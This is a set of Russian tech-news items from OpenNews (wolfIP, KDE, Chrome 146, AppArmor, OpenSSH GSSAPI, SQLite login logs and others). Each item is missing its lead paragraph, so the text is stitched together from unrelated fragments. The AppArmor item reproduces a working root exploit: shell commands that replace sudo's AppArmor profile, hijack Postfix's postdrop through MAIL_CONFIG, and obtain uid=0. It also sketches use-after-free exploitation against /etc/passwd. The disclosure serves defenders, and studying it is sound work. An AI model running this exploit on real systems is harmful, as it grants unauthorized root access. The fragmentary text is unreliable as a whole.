Проект может использоваться в качестве работающего в пользовательском пространстве TCP/IP-стека, подменяющего сетевой стек Linux, FreeBSD и macOS, а также пригодного для применения во встраиваемых системах на базе FreeRTOS, SafeRTOS, Zephyr, Azure RTOS ThreadX, NuttX, RTEMS, VxWorks и QNX. Помимо этого на базе wolfIP могут создаваться самодостаточные сетевые приложения, запускаемые поверх оборудования (bare-metal). В сочетании с библиотекой wolfSSL предоставляется поддержка TLS 1.3, что позволяет создавать компактные встраиваемые системы, поддерживающие HTTPS.

Основные особенности wolfIP:

• Использование при обработке сетевых пакетов предварительно выделенных в статической памяти буферов. Вызовы malloc и free не используются.
• Возможность использования вместо штатных системных сетевых стеков на POSIX-системах.
• Поддержка BSD-сокетов в неблокирующем и блокирующем режиме.
• Компактный размер (4200 строк кода, в 4 раза меньше TCP/IP стека lwIP).
• Поддержка сетевых интерфейсов STM32 Ethernet.
• Возможность использования сетевого интерфейса TAP для тестирования работы без оборудования.
• Разработка с оглядкой на системы с повышенными требованиями к безопасности: детерминированная и воспроизводимая конфигурация; модель развёртывания, обеспечивающая безопасность (Secure-by-default); изоляция между компонентами. Поддержка безопасного обновления версий; длительное сопровождение.
• Учёт требований к высоконадёжным системам: отсутствие динамического выделения ресурсов; фиксированные пулы памяти; контролируемое использование ресурсов; предсказуемое поведение; упрощённая архитектура; поддержка генерации артефактов для верификации.
• Реализация IPv4, UDP, TCP, IPSEC, ARP, ICMP, DHCP-клиента, DNS-клиента и HTTP/HTTPS-сервера. Поддержка в реализации TCP RFC 7323 (TCP Timestamps, RTT measurement, PAWS, Window Scaling), MSS (Maximum Segment Size), RTO (Retransmission timeout) и SACK (Selective Acknowledgment). Несколько алгоритмов контроля перегрузки (congestion control).

Из ограничений wolfIP отмечается возможность использования wolfIP только в роли конечного узла, способного принимать и устанавливать соединения, но не поддерживающего маршрутизацию трафика между сетевыми интерфейсами.

В дополнение можно отметить активное развитие сотрудником Red Hat похожего TCP/IP стека passt, работающего в пользовательском пространстве и не использующего динамическое выделение памяти. Проект passt развивается для организации канала связи между хост-окружением и гостевыми системами в QEMU в качестве более безопасной замены libslirp. Код passt написан на языке Си, насчитывает около 5000 строк и распространяется под лицензией GPLv2+.

Из особенностей passt можно отметить: поддержка IPv6 помимо IPv4, оптимизации на базе инструкций AVX2, защита от synflood, встроенная поддержка QEMU, libvirt и Podman, пакеты для всех популярных дистрибутивов, сервис ARP proxy, минималистичные серверы DHCPD, DHCPv6 и NDP, seccomp-профиль для блокирования всех неиспользуемых системных вызовов, поддержка NAT, возможность использования в качестве прозрачной замены slirp4netns.

1. Главная ссылка к новости
2. OpenNews: Выпуск криптографической библиотеки wolfSSL 5.0.0
3. OpenNews: Intel представил сокращённый вариант сетевого стека для Linux
4. OpenNews: Проект LibOS развивает вариант ядра Linux с сетевым стеком в форме библиотеки
5. OpenNews: Выпуск сетевого стека F-Stack 1.24, выполняемого в пространстве пользователя
6. OpenNews: Доступен открытый Wi-Fi стек OpenWifi 1.4

Проект написан на TypeScript c использованием React, Vite, Zustand, Tailwind CSS и Lucide React. Код распространяется под лицензией MIT. Из особенностей разработки отмечается, что почти весь код TUI Studio написан AI-ассистентом Claude.

В TUI Studio предоставляется более 20 готовых компонентов для формирования интерфейса (кнопки, меню, таблицы, списки, индикатор прогресса, диалоги, всплывающие подсказки и т.п.) и поддерживается 8 тем оформления, а также светлый и тёмный режим, градиентные заливки, ASCII-цвета и акцентные цвета. Имеется возможность отката изменений. Доступен интерфейс для создания своих компонентов. Проекты сохраняются в формате JSON.

1. Главная ссылка к новости
2. OpenNews: Релиз консольной библиотеки ncurses 6.6
3. OpenNews: cool-retro-term - эмулятор терминала, симулирующий вывод на ретро дисплеях
4. OpenNews: Выпуск системы терминального доступа LTSM 1.0
5. OpenNews: Первый выпуск эмулятора терминала Ghostty
6. OpenNews: Первый выпуск Term.Everything для запуска графических приложений в терминале

В качестве причины разработки открытой альтернативы отмечается недовольство низкой стабильностью работы Logitech Options+ (например, последний выпуск стал потреблять 40-60% ресурсов CPU на устройствах Intel Macbook Pro) и желанием избавиться от отправки телеметрии, привязки к облачному сервису Logitech и необходимости регистрироваться на сайте Logitech.

Среди возможностей MouseControl:

• Ремапинг всех 6 программно настраиваемых кнопок мыши;
• Возможность привязки к приложениям отдельных профилей с настройками;
• Реализация 22 действий, связанных с навигацией, работе в браузере, редактированием и управлением воспроизведением мультимедиа;
• Настройка DPI и скорости перемещения указателя;
• Опции для инвертирования направления вертикальной и горизонтальной прокрутки;
• Автоматическое обновление соединения после временного отключения мыши.
• Поддержка сворачивания в системный лоток.
• Хранение настроек в читаемом файле в формате JSON.
• Графический интерфейс на базе Qt Quick с поддержкой тёмной темы оформдения и интерактивными диаграммами.

1. Главная ссылка к новости
2. OpenNews: BLUFFS - уязвимости в Bluetooth, позволяющие провести MITM-атаку
3. OpenNews: Выпуск OpenRGB 0.9, инструментария для управления RGB-подсветкой периферийных устройств
4. OpenNews: Воссоздание криптографических ключей на основе анализа видео с LED-индикатором питания
5. OpenNews: В Linux обеспечена возможность устранения уязвимости MouseJack в устройствах Logitech

• Добавлен режим ввода с клавиатуры диакритических знаков и спецсимволов, отсутствующих на физической клавиатуре. При удержании нажатия клавиши, связанной со спецсимволом, теперь показывается всплывающая подсказка, позволяющая во время ввода быстро выбрать нужный спецсимвол. Выбор осуществляется клавишами управления курсором, нажатием упомянутых в подсказке цифр или кликом мыши. Режим реализован в модуле plasma-keyboard и требует включения виртуальной клавиатуры (System Settings > Keyboard > Virtual Keyboard).
  
  
• Предоставлена возможность установки собственных звуковых тем из загруженных архивов, без необходимости их предварительной ручной распаковки в каталог .../share/sounds.
• Подготовлен обработчик KIO S3, позволяющий напрямую из Dolphin и приложений KDE работать с файлами, хранимыми в S3-совместимых облачных хранилищах, таких как Amazon S3, Cloudflare R2, DigitalOcean Spaces и MinIO.
• В виджетах для управления буфером обмена и сетевым подключением реализовна унифицированная кнопка возврата на прошлую страницу (на вложенных страницах теперь не показываются две кнопки "Назад").
  
  
• В KRunner по умолчанию включён плагин вывода информации о глобальных комбинациях клавиш.
• В виджете с реализацией глобального меню обеспечен показ меню для активного окна, даже если это окно размещено на другом экране. Для возвращения старого поведения, при котором меню пропадает после перемещения окна на другой экран, в настройки добавлена специальная опция.
• При мозаичной компоновке двух смежных окон они теперь равномерно центрируются во всём доступном экранном пространстве с учётом панелей (раньше ближайшее к панели окно сжималось больше, чем другое окно).
• В изолированных приложениях повышена надёжность инициирования записи скринкастов и запросов к удалённым рабочим столам.
• Налажено задействование 3D-ускорения в конфигурациях с несколькими GPU, один из которых не поддерживает OpenGL.
• Решены проблемы работы с буфером обмена в некоторых приложениях на базе фреймворка wxWidgets, таких как KiCad и Audacity. Исправление включено в состав находящейся в разработке ветки wxWidgets 3.3.3.
• В утилиту kscreen-doctor добавлена поддержка изменения свойства экранов "AutoRotatePolicy", определения активного экрана и одновременного включения/выключения поддержки HDR и расширенного диапазона цветов (Wide Gamut).
• Опубликован выпуск Marknote 1.5, приложения для создания и управления коллекцией текстовых заметок, сохраняемых в формате Markdown. В новой версии помимо ранее доступного WYSIWYG-режима визуального редактирования текста, добавлен режим для работы с исходной разметкой Markdown. Также добавлена поддержка вставки ссылок между заметками, реализован полнотекстовый поиск и предложен плагин для интеграции с KRunner.
  1. Главная ссылка к новости
  2. OpenNews: Недельный отчёт о разработке KDE. Скруглённый стиль выделения в KDE
  3. OpenNews: Отчёт о разработке KDE. Проект SonicDE продолжил развитие KDE для систем с X11
  4. OpenNews: Релиз среды рабочего стола KDE Plasma 6.6
  5. OpenNews: Плагин к KWin для использования KDE в виртуальной реальности
  6. OpenNews: Проект MiDesktop развивает форк KDE 1 для современных систем

Отдельно компания Google анонсировала публикацию официальных сборок Chrome для Linux-систем на базе архитектуры ARM64. Linux-сборки для ARM64 начнут формироваться во втором квартале 2026 года и будут доступны в пакетах deb и rpm. Ранее официальные сборки Chrome для Linux публиковались только для архитектуры x86_64, а для архитектуры ARM64 были доступны только сторонние сборки Chromium, предлагаемые дистрибутивами. Официальная версия Chrome отличается поддержкой подключения к учётной записи в Google, интеграцией сервисов Google, синхронизацией данных между устройствами, упрощённой установкой дополнений из каталога Chrome Web Store и возможностью включения расширенного режима защиты.

Основные изменения в Chrome 146:

• Для части пользователей включён механизм выборочного ограничения полномочий (Selective permission intervention), который блокирует доступ связанных с показом рекламы JavaScript-скриптов к возможностям, влияющим на конфиденциальность, таким как доступ к информации о местоположении, микрофону, буферу обмена, Bluetooth, USB, последовательному порту и захвату экрана. Идея в том, что если пользователь предоставил странице доступ к подобным возможностям, то эти разрешения не будут применяться для размещённых на этой странице сторонних скриптов, загружаемых с других сайтов (обособленно через тег iframe или напрямую через тег script).
• Изменена структура настроек, связанных с обеспечением безопасности. Для упрощения пользователю предоставлена возможность выбора между стандартным и усиленным уровнем защиты, что позволяет получить желаемый уровень безопасности без необходимости разбираться в деталях и расширенных опциях. При выборе усиленного режима дополнительно выполняется проверка URL и содержимого на серверах Google, выводятся предупреждения для незащищённых соединений и замедляется работа нетипичных для пользователя сайтов для блокирования атак. При желании пользователь может вернуться к старой схеме раздельного конфигурирования каждой настройки. Для управления включением нового оформления настроек безопасности предложен параметр "chrome://flags/#bundled-security-settings".
• Продолжено развитие AI-режима, позволяющего взаимодействовать с AI-агентом из адресной строки или со страницы, показываемой при открытии новой вкладки. AI-режим даёт возможность задавать сложные вопросы на естественном языке и получать ответы на основе агрегирования информации из наиболее релевантных страниц на заданную тему. При необходимости пользователь может уточнять информацию наводящими вопросами. Режим также позволяет задавать вопросы о содержимом страницы прямо из адресной строки. В Chrome 146 реализована возможность использования файлов из хранилища Google Drive в качестве контекста для AI-агента.
• В режиме автоматического заполнения полей предоставлена возможность использования дополнительных типов данных, которые ранее были доступны только при включении режима расширенного автозаполнения (Enhanced autofill).
• Началось постепенное включение у пользователей защиты от обращения к локальной системе при взаимодействии с публичными сайтами. Обращения с сайтов к IP-адресам локальной сети (интранет или внутренние адреса) или loopback-интерфейсу (127.0.0.0/8) потребует подтверждения операции у пользователя. Под действия защиты попадают попытки загрузки ресурсов, запросы fetch() и iframe-вставки. Защита пока не применяется для соединений через WebSockets, WebTransport и WebRTC, но будет добавлена для них в следующем выпуске.

  Обращение к внутренним ресурсам используются злоумышленниками для косвенной идентификации и осуществления CSRF-атак на маршрутизаторы, точки доступа, принтеры, корпоративные web-интерфейсы и другие устройства и сервисы, принимающие запросы только из локальной сети. Для управления попаданием подсетей в категорию внутренних или публичных предложена настройка LocalNetworkAccessIpAddressSpaceOverrides, а для автоматического разрешения доступа для дочерних iframe на основании полномочий родительского iframe-а добавлена настройка LocalNetworkAccessPermissionsPolicyDefaultEnabled.

• Добавлены CSS-свойства "animation-trigger" и "trigger-scope" для управления анимацией на основе позиции прокрутки страницы. Например, можно запускать, останавливать или перезапускать анимацию при достижении определённой позиции прокрутки, обходясь только декларативным CSS без использования кода на JavaScript.
• Реализована поддержка реестра пользовательских элементов для разделения области видимости пользовательских HTML-элементов, что может потребоваться при использовании на одной странице нескольких разных пользовательских HTML-элементов, имеющих одно и то же имя. В случае использования на странице нескольких библиотек, определяющих элемент с одинаковым именем, при помощи JavaScript-объекта CustomElementRegistry элементы каждой библиотеки можно закрепить за определёнными частями иерархии DOM. Например, если две библиотеки определяют разные элементы с одинаковым именем <my-button>, то в одной части страницы можно использовать элемент <my-button> из первой библиотеки, а на другой - из второй.
• Добавлен API Sanitizer, который может быть полезен для чистки поступающих извне данных и вырезания из них HTML-тегов, которые могут использоваться для совершения XSS-атак. API предоставляет методы для манипуляции HTML и вырезания из содержимого HTML-элементов, влияющих на отображение и исполнение. Для безопасной вставки HTML-содержимого предложен метод element.setHTML(), похожий на element.innerHTML, но защищающий от межсайтового скриптинга (XSS). Для безопасного разбора HTML реализован метод document.parseHTML().

  
     const unsanitizedString = "abc <script>alert(1)<" + "/script> def";
  
     const sanitizer1 = new Sanitizer({
       elements: ["div", "p", "button", "script"],
     });
     const target = document.getElementById("target");
     target.setHTML(unsanitizedString, { sanitizer: sanitizer1 });
  

• В элементе "meta" реализован параметр с именем "text-scale" (например, <meta name="text-scale" content="scale">), включающий автоматическое масштабирование размера шрифта на странице в соответствии с настройками браузера и операционной системы, если на странице используются относительные единицы измерения (rem и em).
• В API WebGPU добавлен опциональный режим совместимости, предоставляющий подмножество функций, способных работать на системах с устаревшими графическими API, такими как OpenGL и Direct3D11.
• В JavaScript добавлена возможность объединять несколько итераторов в один с помощью метода Iterator.concat().
• В режиме "Origin trials" реализован API WebNN, позволяющий использовать предоставляемые операционной системой сервисы для машинного обучения и связанные с этим аппаратные возможности.
• В режиме "Origin trials" реализован API CPU Performance для получения информации об уровне производительности и характеристиках процессора (число ядер, тип, архитектура, модель, частота и т.п.).
• В режиме "Origin trials" добавлен атрибут "focusgroup", позволяющий вместо табуляции использовать клавиши управления курсором для перемещения между кнопками или другими элементами, связанными с переключением фокуса.
• Внесены улучшения в инструменты для web-разработчиков. В web-консоли обеспечено сохранение результатов редактирования команд при навигации по истории операций. В панели Elements реализовано отображение CSS-стилей, добавленных программно к Shadow DOM, через отдельный узел "#adopted-style-sheets" в дереве DOM, по аналогии с просмотром и редактированием стилей, определённых через тег <style>.

Кроме нововведений и исправления ошибок в новой версии устранено 29 уязвимостей. Многие из уязвимостей выявлены в результате автоматизированного тестирования инструментами AddressSanitizer, MemorySanitizer, Control Flow Integrity, LibFuzzer и AFL. Одной из проблем (переполнение буфера в WebML) присвоен критический уровень опасности, подразумевающий, что уязвимость позволяет обойти все уровни защиты браузера и выполнить код в системе за пределами sandbox-окружения. В рамках программы по выплате денежного вознаграждения за обнаружение уязвимостей для текущего релиза компания Google учредила 29 премий и выплатила 211 тысяч долларов США, что стало рекордом по размеру выплат в рамках одного релиза (две премии $43000, по одной премии в $36000, $33000, $11000 и $7000, по две премии в $10000 и $3000, по 4 премии в $2000 и $1000). Размер 12 вознаграждений пока не определён.

1. Главная ссылка к новости
2. OpenNews: Выпуск Chrome 145
3. OpenNews: Chrome переходит на двухнедельный цикл подготовки релизов
4. OpenNews: Инструментарий для удаления избыточной функциональности из Chrome, Edge и Firefox
5. OpenNews: Chrome 154 начнёт запрашивать подтверждение при открытии сайтов без HTTPS
6. OpenNews: Google представил AI-возможности Chrome

Проблемы присутствуют в LSM-модуле AppArmor начиная с ядра Linux 4.11, выпущенного в 2017 году, и проявляются в дистрибутивах, использующих AppArmor, таких как Ubuntu, Debian, openSUSE и SUSE (начиная с openSUSE/SUSE 16 по умолчанию задействован SELinux, но AppArmor оставлен в качестве опции). Патчи с устранением уязвимостей переданы разработчикам ядра Linux и в ближайшие дни будут предложены пользователям в составе обновлений 6.18.18, 6.19.8, 6.12.77, 6.6.130, 6.1.167, 5.15.203 и 5.10.253. Исправление также включено в сегодняшние обновления пакетов с ядром для Ubuntu. Попутно в Ubuntu выпущены обновления пакетов sudo, sudo-ldap и util-linux (в состав входит утилита su), в которых устранены недоработки, позволявшие эксплуатировать уязвимость в AppArmor. В Debian обновление в процессе подготовки.

Проблемы вызваны наличием в AppArmor фундаментальной уязвимости класса "обманутый посредник" ("confused-deputy"), позволяющей непривилегированным пользователям загружать, заменять и удалять произвольные профили AppArmor. Данная уязвимость напрямую может использоваться для отключения защиты программ и сервисов от локальных и удалённых атак (через запись псевдофайлов /sys/kernel/security/apparmor/.load, .replace и .remove, например, для снятия ограничений в cupsd и rsyslogd), вызова отказа в обслуживании (через применение запрещающих профилей) и обхода ограничений пространств имён (через загрузку нового AppArmor-профиля "userns", например, для /usr/bin/time, позволяющего создавать неограниченные user namespace).

Возможность замены профилей AppArmor также позволяет добиться получения root-привилегий через привязку к привилегированным утилитам, таким как su и sudo, новых профилей, блокирующих доступ к некоторым системным вызовам. В частности, права root можно получить блокировав операцию setuid (CAP_SETUID) для утилиты sudo в сочетании с манипуляцией переменной окружения MAIL_CONFIG для смены каталога с настройками для почтового сервера Postfix.

Суть метода в том, что при возникновении проблем утилита sudo отправляет администратору письмо, запуская /usr/sbin/sendmail. Блокировав сброс привилегий можно добиться запуска данного процесса с правами root, а выставив перед запуском sudo переменную окружения MAIL_CONFIG можно передать утилите sendmail другие настройки, в том числе указать свой обработчик postdrop, запускаемый при отправке почты.

   $ mkdir /tmp/postfix

   $ cat > /tmp/postfix/main.cf << "EOF"
   command_directory = /tmp/postfix
   EOF

   $ cat > /tmp/postfix/postdrop << "EOF"
   #!/bin/sh
   /usr/bin/id >> /tmp/postfix/pwned
   EOF

   $ chmod -R 0755 /tmp/postfix

   $ apparmor_parser -K -o sudo.pf << "EOF"
   /usr/bin/sudo {
     allow file,
     allow signal,
     allow network,
     allow capability,
     deny capability setuid,
   }
   EOF

  $ su -P -c 'stty raw && cat sudo.pf' "$USER" > /sys/kernel/security/apparmor/.replace
   Password: 

  $ env -i MAIL_CONFIG=/tmp/postfix /usr/bin/sudo whatever

   sudo: PERM_SUDOERS: setresuid(-1, 1, -1): Operation not permitted
   sudo: unable to open /etc/sudoers: Operation not permitted
   sudo: setresuid() [0, 0, 0] -> [1001, -1, -1]: Operation not permitted
   sudo: error initializing audit plugin sudoers_audit

   $ cat /tmp/postfix/pwned
   uid=0(root) gid=1001(jane) groups=1001(jane),100(users)

В качестве других способов повышения привилегий упоминаются уязвимости в коде AppArmor, работающем на уровне ядра Linux. Показано как получить права root при помощи уязвимостей, вызванных двойным выполнением функции free() и обращением к уже освобождённой области памяти (use‑after‑free) в коде загрузки и замены профилей AppArmor. Например, AppArmor сохраняет профиль в структуре aa_loaddata, память для которой выделяется в slab-кэше kmalloc-192, при этом из-за состояния гонки не исключено обращение к памяти, которую занимала структура, после её освобождения. Данную проблему можно использовать для получения контроля над освобожденной памятью и перераспределения освобождённой страницы памяти для маппинга содержимого файла /etc/passwd и перезаписи строки с паролем root.

1. Главная ссылка к новости
2. OpenNews: AppArmor и Yama будут включены в Linux-ядро 2.6.36
3. OpenNews: Root-уязвимость в инструментарии управления пакетами Snap
4. OpenNews: Уязвимости в PAM и libblockdev, позволяющие получить права root в системе
5. OpenNews: Уязвимость в Glibc ld.so, позволяющая получить права root в большинстве дистрибутивов Linux
6. OpenNews: Выявлена возможность обхода ограничений доступа к "user namespace" в Ubuntu

Примечательно, что в своё время разработчики OpenSSH отказались принимать в основной состав изменение для поддержки GSSAPI из-за сомнений в его безопасности. При этом многие дистрибутивы Linux включили данный патч в свои пакеты c OpenSSH. В обиходе встречается несколько версий GSSAPI-патча, но в большинстве из них имеется приводящая к уязвимости ошибка. Исправление пока доступно только в форме патча, изменения в котором сводятся к замене вызова функции sshpkt_disconnect() на ssh_packet_disconnect() в файле kexgsss.c.

В настоящее время наличие уязвимости подтверждено в Debian и Ubuntu. В остальных дистрибутивах применение проблемного патча и его подверженность уязвимости уточняется (SUSE/openSUSE, RHEL, Gentoo, Arch, Fedora). Уязвимость проявляется только при включении в настройках опции "GSSAPIKeyExchange yes". На возможность эксплуатации также влияют опции компилятора с которыми в дистрибутивах собран пакет.

Причиной возникновение уязвимости является ошибка в функции sshpkt_disconnect(), из-за которой процесс не завершался после поступления disconnect-сообщения, что позволяло атакующему на стадии согласования ключей отправить не предусмотренный логикой работы сервера тип GSSAPI-сообщения. После поступления внепланового GSSAPI-сообщения, сервер помещает его в очередь и не прерывает выполнение программы, но при этом не инициализирует переменные, определяющие параметры соединения. В дальнейшем в цикле обработки событий выполняется код, который читает неинициализированную структуру recv_tok из стека (читаются данные, оставшиеся в стеке от прошлого вызова функции), отправляет её привилегированному процессу через IPC и затем передаёт в функцию gss_release_buffer(), которая может вызвать функцию free() и освободить память для некорректного указателя, ссылающегося на случайную область памяти.

1. Главная ссылка к новости
2. OpenNews: Уязвимости в Samba, приводящие к переполнению буфера и выходу за границу базового каталога
3. OpenNews: Обновление DNS-сервера BIND c устранением уязвимости, допускающей удалённое выполнение кода
4. OpenNews: Пример анализа потенциально серьезной уязвимости в OpenSSH
5. OpenNews: Уязвимость в поставляемом во FreeBSD варианте OpenSSH, допускающая удалённое выполнение кода
6. OpenNews: Уязвимость в пакетах с OpenSSH из состава RHEL 9, допускающая удалённое выполнение кода

В настоящее время для хранения данных о сеансах и попытках аутентификации в Linux используются следующие бинарные файлы, имеющие фиксированную структуру:

• /var/log/lastlog - время последнего входа (структура "struct lastlog" с полем "ll_time" 32-разрядного типа time_t);
• /var/log/btmp - неудачные попытки входа;
• /var/run/utmp - текущие сеансы;
• /var/log/wtmp - история входов и выходов.

Формат данных файлов был разработан несколько десятилетий назад и имеет ряд фундаментальных ограничений:

• Поле "tv_sec" в структуре "utmpx" и поле "ll_time" в "lastlog" имеют тип "int32_t", значение счётчиков времени на основе которого переполнится 19 января 2038 года. Из-за требований ABI‑совместимости даже на 64-разрядных системах эти поля остаются 32-разрядными, поэтому проблема затронет все установки Linux.
• Фиксированный размер записей не позволяет добавлять новые поля (например, идентификатор контейнера, имя сервиса, IP-адрес) без полной замены формата и перекомпиляции всех утилит.
• Утилиты last, lastb, who и lastlog вынуждены линейно перебирать содержимое файлов. При большом размере журналов без использования индексов, позволяющих эффективно фильтровать записи, нагрузка на систему ввода/вывода и задержки при выполнении запросов становятся неприемлемыми.
• Запись в бинарный файл не является атомарной операцией. При сбое запись может быть частично повреждена.
• Для исключения конфликтов при одновременной записи в журнал несколькими процессами (например, sshd и login) используются flock-блокировки, которые не гарантируют атомарность и могут приводить к взаимным блокировкам.

Автор RFC предлагает полностью отказаться от бинарных форматов в пользу специализированных разделяемых библиотек, использующих SQLite. Для каждого типа журналов создаётся отдельная библиотека с единообразным C-интерфейсом: liblastlog2, libbtmp2, libutmp2 и libwtmp2. Все библиотеки работают с БД, схема которых включает 64-разрядные временные метки (тип INTEGER) и индексы по пользователю и времени. Имеется возможность добавления новых полей без нарушения совместимости (через ALTER TABLE).

Среди доводов в пользу использования SQLite упоминается использование 64-разрядного типа INTEGER для хранения эпохального времени, задействование индексов для снижения ввода/вывода за счёт выборочного обращения к записями вместо полного сканирования, возможность добавления новых полей без изменения существующих записей, поддержка ACID-транзакций, режим WAL (Write-Ahead Logging) для конкурентного доступа без блокировок, проверенная надёжность работы SQLite.

Для обеспечения плавного перехода предлагается стратегия "двойной записи" (dual-write):

• Программы, которые пишут в бинарные файлы (login, sshd, sudo, cron и др.), модифицируются так, чтобы одновременно выполнять запись и в старый бинарный файл, и в новую SQLite-базу через соответствующую библиотеку.
• Разрабатываются новые версии утилит (last2, lastb2, who2, lastlog2), которые читают данные из SQLite-баз, используя индексы для быстрой работы. Старые утилиты продолжают работать с прежними файлами.
• Через несколько лет, когда подавляющее большинство систем обновятся, поддержка записи в старые форматы может быть отключена, а старые утилиты - объявлены устаревшими.

Вопросы, выставленные для дополнительного обсуждения:

• Целесообразность разделения на отдельные библиотеки или объединения в одну (например, libsession2).
• Выбор имён для библиотек и утилит (сохранить исторические названия или перейти к более общим).
• Расположение файлов баз данных (/var/lib/ как для состояния приложений или /var/log/ как для логов).
• Механизм версионирования схемы и миграции.
• Параметры производительности SQLite для различных сценариев (серверы, встраиваемые системы).
• Предоставление fallback-бэкенда, хранящего журналы в упрощённом бинарном формате, для систем, на которых SQLite может оказаться избыточным (например, встраиваемые устройства с жёсткими ограничениями по памяти).

1. Главная ссылка к новости
2. OpenNews: Для избавления Glibc от проблемы 2038 года предложено прекратить использование utmp
3. OpenNews: Уязвимость в SQLite, позволяющая удалённо атаковать Chrome через WebSQL
4. OpenNews: Проект Redka развивает реализацию протокола и API Redis поверх SQLite
5. OpenNews: Эксперимент с использованием SQLite в качестве контейнера для архивирования файлов
6. OpenNews: Google использовал большую языковую модель для выявления уязвимости в SQLite

Из потраченной в 2025 году суммы $2.9 млн (в 2024 году $3.3 млн, в 2023 - $3.4 млн) выплачено за уязвимости в Android. За информацию об уязвимостях в браузере Chrome выплачено 100 премий на общую сумму $3.7 млн (в 2024 году $2.1 млн, в 2023 - $3.5 млн). За уязвимости в открытых проектах выплачены 62 премии на сумму 327 тысяч долларов. За уязвимости в облачных продуктах Google выплачено 143 премии на сумму $3.5 млн. За уязвимости в AI-продуктах выплачено 890 тысяч долларов.

Размер самой большой единичной выплаты составил 250 тысяч долларов за обнаружение логической ошибки в IPC-механизме Chrome, позволившей создать эксплоит для выполнения кода в обход применяемой в браузере sandbox-изоляции.

1. Главная ссылка к новости
2. OpenNews: Google отключил поддержку io_uring в ChromeOS и Android из-за плачевного состояния безопасности
3. OpenNews: Google учредил команду для помощи открытым проектам в усилении безопасности
4. OpenNews: Google занялся продвижением средств безопасной работы с памятью в открытом ПО
5. OpenNews: В 2024 году Google выплатил 11.8 млн долларов вознаграждений за выявление уязвимостей
6. OpenNews: Google меняет политику публикации исправлений уязвимостей в Android

По словам создателя Lutris, несколько месяцев назад AI-инструментарий Claude стал генерировать вполне достойный код и благодаря AI удалось сделать всё, что было упущено в прошлом году из-за проблем со здоровьем и депрессии. Он также заявил, что предполагал возможный негатив в отношении появления изменений, подготовленных с использованием AI, и поэтому несколько дней назад удалил упоминание о соавторстве Claude из коммитов и пожелал удачи в попытках определить, что было сгенерировано AI, а что - нет.

1. Главная ссылка к новости
2. OpenNews: Выпуск Lutris 0.5.20 и Bottles 0.62, платформ для упрощения запуска игр в Linux
3. OpenNews: Сопровождающие Godot перегружены из-за обилия сомнительных изменений, созданных с помощью AI
4. OpenNews: Компоненты браузера Ladybird начали переписывать на Rust при помощи AI
5. OpenNews: Эксперименты с использованием AI для улучшения кода BIND 9 и переработки Next.js
6. OpenNews: Переписывание кода при помощи AI для перелицензирования открытых проектов

   // Без DSL:
   auto result = bind(mx, [&](auto x) {
     return bind(my, [&](auto y) {
       return make_value(x, y);
     });
   });
   
   // С DSL:
   auto result = DO(
     LET x IS(mx);
     LET y IS(my);
     return make_value(x, y);
   );

Дополнение: Принцип работы DSL в разрезании потока на токены. "LET name IS(value)" раскрывается в "), _LET_IS(name, (value)), _CODE(". Таким образом, весь код оказывается в блоках "_CODE", а "LET IS" и прочее выходят как метки. Дальше нужно лишь пройтись по всем меткам и обработать. В DSL поддерживаются циклы (WHILE, BREAK, CONTINUE) и ветвления (IF). Циклы работают через рекурсию. Внутри таких блоков кода можно использовать другие блоки (IF, WHILE, LET IS).

1. Главная ссылка к новости
2. OpenNews: Выпуск языка программирования Nim 2.2.8
3. OpenNews: Выпуск компилятора языка D 2.112
4. OpenNews: Программно-аппаратная платформа CHERIoT 1.0 для повышения безопасности кода на языке Си
5. OpenNews: Доступен язык программирования OCaml 5.4.0

Moonforge предоставляет разработчикам и системным интеграторам каркас, набор файлов конфигурации и коллекцию компонентов для формирования атомарно обновляемых системных образов, основанных на применении уже проверенных и распространённых в индустрии технологий, таких как yocto, bitbake и kas. Для сформированных образов поддерживается упрощённый процесс установки обновлений и обеспечивается длительный цикл сопровождения. Основная цель проекта - предоставить разработчикам встраиваемых систем удобный инструментарий, дающий возможность сосредоточиться на развитии специфичной для их продукта функциональности и не тратить время на задачи, связанные с формированием и поддержанием дистрибутива.

Системный образ компонуется из набора готовых модулей Yocto. Каждый модуль отвечает за определённую возможность или поддержку конкретной целевой аппаратной платформы. Например, предлагаются модули для поддержки Docker, QEMU или Podman, управления обновлениями через RAUC, формирования графического интерфейса на базе композитного сервера Weston, запуска браузерного интерфейса на базе Webkit для интернет-киосков и сборки для плат Raspberri Pi 4 и 5.

Поддерживается три канала распространения релизов: stable (стабильная LTS-ветка), next (ветка, в которой развивается следующий LTS-релиз) и main (экспериментальная ветка, в которой ведётся разработка). Каждая ветка привязана к своей версии набора компонентов Yocto. Стабильная ветка обновляется раз в месяц и соответствует LTS-релизам Yocto.

Обновления доставляются в режиме OTA (Over-The-Air) с использованием инструментария Mender и устанавливаются атомарно через замену целиком всей системы. На накопителе создаётся два идентичных корневых раздела - активный и пассивный. Новое обновление устанавливается в пассивный раздел, никак не влияя на работу активного. После перезагрузки разделы меняются местами - раздел с новым обновлением становится активным, а прошлый активный раздел переводится в пассивный режим и ожидает установки следующего обновления. Если после обновления что-то пошло не так, осуществляется откат на прошлый вариант системы.

Для создания системных образов используется инструментарий BitBake, а для формирования конфигурации и обеспечения воспроизводимых сборок - kas. Сборки, обновления, отчёты об уязвимостях и метаданные SBOM (Software Bill of Materials) автоматически собираются и публикуются с использованием систем непрерывной интеграции и непрерывного развёртывания (CI/CD). Сборочная инфраструктура на базе Moonforge может быть развёрнута как на локальных серверах, так и в публичных или приватных облачных окружениях.

Для прозрачности и предсказуемости процессов создания производных продуктов в дистрибутиве применяется жёсткое разделение между upstream- и downstream-компонентами, позволяющее разработчикам при необходимости добавлять дополнительную функциональность поверх базовой начинки. Конфигурация определяется в декларативном представлении, используя формат YAML, и охватывает такие области как подключение внешних репозиториев, активация модулей Yocto, управление зависимостями между компонентами дистрибутива, применение дополнительных патчей и изменение применяемых по умолчанию системных настроек.

1. Главная ссылка к новости
2. OpenNews: Компания Collabora представила Apertis 2024.3, дистрибутив для электронных устройств
3. OpenNews: Дистрибутив Chimera Linux, сочетающий ядро Linux с окружением FreeBSD
4. OpenNews: Доступен Oryx Linux, новый дистрибутив для встраиваемых систем
5. OpenNews: Выпуск дистрибутива для мобильных телефонов NemoMobile 0.7
6. OpenNews: Доступен дистрибутив Amazon Linux 2023

Ранее оптимизация AutoFDO уже применялась в Android при сборке системных библиотек и исполняемых файлов в пользовательском пространстве, и в среднем позволила ускорить запуск программ на 4% и сократить время загрузки на 1%. При этом оптимизация AutoFDO до недавних пор не применялась для ядра Linux, на выполнение компонентов которого по статистике Google в Android тратится 40% процессорного времени.

